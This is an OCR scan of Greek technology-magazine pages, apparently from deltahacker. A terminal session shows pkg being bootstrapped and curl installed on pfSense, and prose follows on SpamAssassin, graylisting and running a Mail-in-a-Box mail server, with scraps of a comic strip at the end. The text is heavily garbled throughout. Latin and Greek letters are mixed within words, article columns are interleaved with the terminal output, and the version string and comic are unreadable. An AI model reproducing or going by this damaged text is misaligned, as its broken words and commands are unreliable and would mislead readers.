- ΕΒ 

[ 1{ e ]/root: 
[ 1t e ]/root: pkg 2” 
The package management tool is not yet installed on your system. 
Do you want to fetch and install it now? [y/N]: y 
Bootstrapping pkg from pkg«http://pkg.FreeBSD.org/freebsd:10:x86:64/latest, please wait... 
Verifying signature with trusted certificate pkg.freebsd.org.2013102301... done 
Installing pkg-1.5.5... 
Extracting pkg-1.5.5: 100% 
Message for pkg-1.5.5: 
If you are upgrading from the old package format, first run: 

# pkg2ng 
pkg: not enough arguments 
Usage: pkg [-v] [-d] [-l] [-N] [-j <jail name or id>|-c <chroot path>|-r <rootdir>] [-C <configuration file>] 
[-R <repo config dir>] [-o var=value] [-4|-6] <command> [<args>] 


For more information on available commands and options see 'pkg help'. 
[ Hi e ]/root: 


Κάτι που «δεν: αναφέραμε έως τώρα εἰναι ότι TO curl απουσιάζει από TO pfSense και 
πρέπει va το εγκαταστήσουµε απὀ τη γραμμή εντολών, αφού πρώτα συνδεθούµε στο 
λογαριασμό rou root µέσω SSH. Το εργαλείο διαχείρισης πακέτων γιατην εγκατάσταση 
TOU Curl εἶναι το pkg κι αν επιχειρήσουµε va το χρησιμοποιήσουμε θα διαπιστώσουμε 
πως ούτε κι αυτό εἶναι εγκατεστημένο! Ερωτόµαστε, ωστόσο, αν το θέλουμε, οπότε 
απαντάµε θετικά κι αµέσως το downloading και η εγκατάστασή του προχωρούν κι ολο- 
κληρώνονται αυτόματα. 


[2.2.4 1[γοστβρί ]/root: pkg install curl d — 
Updating FreeBSD repository catalogue... D 
Att repositories are up toda Πα την εγκατάσταση rou curl 
Checking integrity... done (0 conflicting) ῃ P s 
The following 2 package(s) will be affected (of 0 checked): γράφουμε, απλά, pkg install curl. 
ο Ημ Γράφοντας curl -νεγοίοη, WOTE 
“ρω να δούµε αν όλα είναι καλά µε το 
ο aa rien προύρημμαι AVOKANOTITOUHE ÓT 
[2/2] metn) aroraa a δεν µπορεί ναβρεθείἰ. Αυτό διορ- 
Message for ον root ner Sie nn θώνεται εύκολα, πληκτρολογώ- 
[ο WARNING eicicicicicioicicicicieicioioicicicicioioioioioioioioioioioioioe d 
FreeBSD does not, and can not warrant that the certification authorities ντας rehash. Γράφοντας ξανά curl 
whose certificates are included in this package have in any way been + " " 
audited for b S or RFC i compliance. m —version TO προγραμ μα καλε ιται 
ο ωρών ον of trust is the complete responsibility of the κανονικά και επιστρέφει πλη po- 
I ο ο ο. φορίες περί έκδοσης, υποστη- 
is package installs symlinks to support root certificates discovery by V ῃ 
default for software τ uses Nec. f l ριζό μενων πρωτο κόλλων και 
This σε Certificate Verification by client software without manual δυνατοτήτων. 


If you prefer to do this manually, replace the following symlinks with 
either an empty file or your site-local certificate bundle. 


* /etc/ssl1/cert.pem 
* /usr/local/etc/ssl/cert. pem 
* /usr/local/openssl/cert.pem 


curl: Command not found. 
[ Hi e 


— 


]/root: rehash 

/root: curl —version 
-43.0 b4- portbld-treebsdið.1) Libcurl/7.43.0 Up L/1.0.11 zlib/1.2.8 

Protocols: d. file ftp ftps gopher http https imap imaps pop3 pop3s rtsp smb smbs smtp smtps telnet tftp 
Features: AsynchDNS IPv6 Largefile GSS-API Kerberos SPNEGO NTLM NTLM WB SSL libz TLS-SRP UnixSockets 
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SpamAssassin και Graylisting 


Πα την αντιμετώπιση rou SPAM το MiaB επιστρατεύει ro SpamAssassin, το Kar 
εξοχήν σύστημα στον κόσµο rou Open Source για την κατηγοριοποίηση της αλλη- 
λογραφίας σε SPAM/HAM. Μερικές φορές κάποιο email θα καταλήγει στον φάκε- 
Ao Spam, ενώ στην πραγματικότητα δεν θα είναι για εκεί. [ta την εκπαίδευση του 
SpamAssassin, αυτό που αρκεί να κάνουμε είναι να µετακινήσουμε το email εκτός 
του φακέλου Spam. Θα συμβαίνει και το αντίστροφο: Κάποιο email που είναι SPAM 
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Πρακτική χρήση rou Mail-in-a-Box και κόλπα 


*Ogv* θα καταλήγει στον ομώνυμο φάκελο, οπότε O' αυτή την περίπτωση καλό είναι 
να το μετακινούμε μόνοι µας εκεί. Συν τω χρόνω το SpamAssassin μαθαίνει και yi- 
νεται αποτελεσµατικότερο — ή τουλάχιστον αυτή εἶναι η θεωρία. 


Ένας άλλος, εξαιρετικά ενδιαφέρων και πολλά υποσχόμενος μηχανισμός για την 
αντιμετώπιση του SPAM είναι το λεγόμενο graylisting. H ιδέα εἶναι ότι για αποστο- 
λεἰς που µας στέλνουν email για πρώτη φορά, η παράδοση εμποδίζεται τεχνητά για 
10 µε 15 λεπτά. H συντριπτική πλειονότητα των spammers ξεγελιούνται απ’ αυτό 
το τρικ και τελικά εγκαταλείπουν τις προσπάθειες αποστολής. Καλό είναι να έχου- 
µε υπόψη µας για το graylisting όποτε περιμένουμε email από κάποιον φίλο που µας 
έστειλε για πρώτη φορά ñ όταν αναμένουμε email επιβεβαίωσης για εγγραφή σε 
site ñ σε υπηρεσία. 


Εντυπώσεις έως τώρα και σχέδια για το (κοντινό) μέλλον 


Τις πρώτες μέρες της ενασχόλησής µας µε ro Mail-in-a-Box παρατηρούσαμε ότι opt 
σμένα emails που στέλναμε έτειναν να χαρακτηρίζονται ως SPAM - και φυσικά δεν 
ήταν. Κάτι τέτοιο εἶναι αναμενόμενο να συμβαίνει στην αρχή, ακόµη κι όταν στέλ- 
VOUE σε χρήστες μεγάλων email providers όπως είναι η Google µε το Gmail. Με 
λίγη προσοχή και καλή διάθεση για συνεννόηση, το πρόβλημα αρχίζει να υποχωρεί 
και τελικά εξαφανίζεται. Τις πρώτες μέρες, π.χ. που στέλνουµε emails σε φίλους 
και χρήστες του Gmail, καλό είναι να τους έχουµε ειδοποιήσει και προειδοποιήσει, 
ώστε να ρίχνουν και µια ματιά στο SPAM folder. Anag κι αρχίσουν να χαρακτηρίζουν 
τα emails µας ως HAM, τότε πολύ σύντομα τα emails µας προς τους χρήστες του 
Gmail δεν” θα χαρακτηρίζονται ως SPAM. 


Εκτός απὀ αυτό το κάπως ενοχλητικό ζήτημα, µετά ATÓ μερικούς μήνες καθηµερι- 
γής χρήσης rou MiaB οφείλουμε να σημειώσουμε ότι είμαστε απόλυτα ευχαριστη- 
μένοι από την πλατφόρμα. Χαιρόμαστε που έχουμε υπό πλήρη έλεγχο το email του 
domain µας (colder.xyz), πολύ περισσότερο που δεν έχουµε συναντήσει προβλήμα- 
τα: ακόµη και η αναβάθμιση στη νέα ἐκδοση rou ΜΙ8Β έγινε ομαλά κι ολοκληρώθηκε 
επιτυχώς. 


Στα μελλοντικά µας σχέδια είναι η φιλοξενία των emails δύο άλλων domains που 
κατέχουµε (deltahacker.gr και parabing.com), oro (Oto box που τρέχει το MiaB και ήδη 
φιλοξενεί το email rou colder.xyz. Σκεφτόµαστε ότι ίσως χρειαστεί να κάνουμε ένα 
resize στο αντίστοιχο VPS, αλλά αυτό θα ro δούµε στην πράξη και θα σας µεταφέ- 
ρουµετις εντυπώσεις µας - ñ ότι ενδιαφέρον ανακαλύψουμε, τέλος πάντων. Κάτι 
άλλο που σχεδιάζουμε και σκοπεύουµε να συζητήσουμε µαζί σας, εἶναι η φιλοξενία 
προσωπικού static site oro box rou MiaB. 


Όπως είπαμε, για όλα τα προηγούμενα και ότι άλλο προκύψει θα συζητήσουµε σε 
επόμενα άρθρα. Προς ro παρὀν σας προτείνουμε va στήσετε κι εσείς τον δικό σας 
mailserver στο cloud. Av διστάζετε σκεφτείτε ότι το ρίσκο εἶναι, πρακτικά, μηδενικό: 
Απλά διατηρήστε τους υπάρχοντες email providers που χρησιµοποιείτε, αγοράστε 
ένα φθηνό domain (που να υποστηρίζει DNSSEC, κατά προτίμηση) και πειραματι- 
στείτε µε ro email για το συγκεκριµένο domain. Κάτι µας λέει πως δεν θα το µετα- 
νιώσετε. 
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r. το ΟΠΛΟ 
ὙΟῚ ΕΠΚΛΙΜΑΙΟ 
ΕΙΝΑΙ ΚΑΤΙ FKN 
KA ΒΑΘΗ. KATI ΖΑΝ 
POMA Oth KoleewA 


TO KATAMMAA, 
ZYo KEPAN ΗΤΑΝ 
ΞΗϊντοιπτιξσο... 


τ AEN E! 
N EMAZ 


ΕΙΘΟΠΟΙΗΣΤΕ 
ΑΜΕΣΟΣ TH AY? zu 
HAE KTPONI KOY 
ΕΓΚΛΗΜΑΝΤΟΣ !.. 


_ Προχαλεξει ATO 
το ΧτήπΏμα.... t1 


deltahacker.gr 


